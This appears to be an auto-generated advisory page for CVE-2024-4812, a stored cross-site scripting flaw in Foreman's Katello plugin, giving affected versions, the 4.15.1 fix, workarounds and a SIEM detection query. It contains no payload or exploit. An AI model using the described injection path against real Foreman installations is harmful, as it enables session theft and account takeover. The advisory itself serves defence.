CVE-2024-4812 – This vulnerability allows stored cross-site scr... (How to Fix)

Q: What is the severity of CVE-2024-4812?

CVE-2024-4812 has a CVSS score of 4.8 (MEDIUM). This vulnerability allows stored cross-site scripting (XSS) attacks in the Katello plugin for Foreman. Attackers can inject malicious JavaScript into user description fields, which executes when victims view affected pages like Host Collections. Organizations using vulnerable versions of Foreman with Katello plugin are affected.

📋 TL;DR

This vulnerability allows stored cross-site scripting (XSS) attacks in the Katello plugin for Foreman. Attackers can inject malicious JavaScript into user description fields, which executes when victims view affected pages like Host Collections. Organizations using vulnerable versions of Foreman with Katello plugin are affected.

💻 Affected Systems

Products:

Foreman with Katello plugin

Versions: Katello plugin versions before 4.15.1

Operating Systems: Linux distributions running Foreman (RHEL, CentOS, etc.)

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects installations where Katello plugin is enabled and users have access to modify description fields.

📦 What is this software?

Katello by Katello Project

View all CVEs affecting Katello →

Satellite by Redhat

View all CVEs affecting Satellite →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, or redirect users to malicious sites, potentially leading to account compromise or further system access.

🟠

Likely Case

Attackers with user account access could perform targeted attacks against administrators or other users viewing affected pages, potentially stealing credentials or session data.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts would be rendered harmless as text rather than executable code.

🌐 Internet-Facing: MEDIUM - If Foreman is internet-accessible, attackers could exploit this to target administrators or users accessing the interface.

🏢 Internal Only: MEDIUM - Internal attackers or compromised accounts could use this to escalate privileges or target other users within the organization.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Requires authenticated access to modify user descriptions. Exploitation is straightforward once access is obtained.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Katello plugin 4.15.1

Vendor Advisory: https://access.redhat.com/security/cve/CVE-2024-4812

Restart Required: Yes

Instructions:

1. Update Katello plugin to version 4.15.1 or later. 2. Restart Foreman services. 3. Verify the fix by checking plugin version.

🔧 Temporary Workarounds

Input validation enhancement

linux

Implement additional input validation for user description fields to sanitize JavaScript content

# Requires custom Foreman plugin development or configuration

Content Security Policy

linux

Implement strict CSP headers to mitigate XSS impact

# Configure in Foreman web server settings or application configuration

🧯 If You Can't Patch

Restrict user permissions to prevent unauthorized users from modifying description fields
Implement web application firewall rules to detect and block XSS payloads in user inputs

🔍 How to Verify

Check if Vulnerable:

Check Katello plugin version: 'foreman-rake katello:version' or check installed package version

Check Version:

foreman-rake katello:version

Verify Fix Applied:

Verify Katello plugin version is 4.15.1 or later and test that JavaScript in description fields is properly sanitized

📡 Detection & Monitoring

Log Indicators:

Unusual modifications to user description fields
JavaScript patterns in user profile updates

Network Indicators:

HTTP requests containing JavaScript payloads in POST data to user update endpoints

SIEM Query:

source="foreman" AND ("description" OR "user_update") AND ("script" OR "javascript" OR "onclick")

📊 Metadata

CVE ID: CVE-2024-4812

CVSS v3 Score: 4.8 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

Published: June 5, 2024

Last Updated: November 21, 2024

🔗 References

https://access.redhat.com/security/cve/CVE-2024-4812 Third Party Advisory
https://bugzilla.redhat.com/show_bug.cgi?id=2280187 Issue Tracking,Third Party Advisory
https://access.redhat.com/security/cve/CVE-2024-4812 Third Party Advisory
https://bugzilla.redhat.com/show_bug.cgi?id=2280187 Issue Tracking,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-4812, you might also want to check these: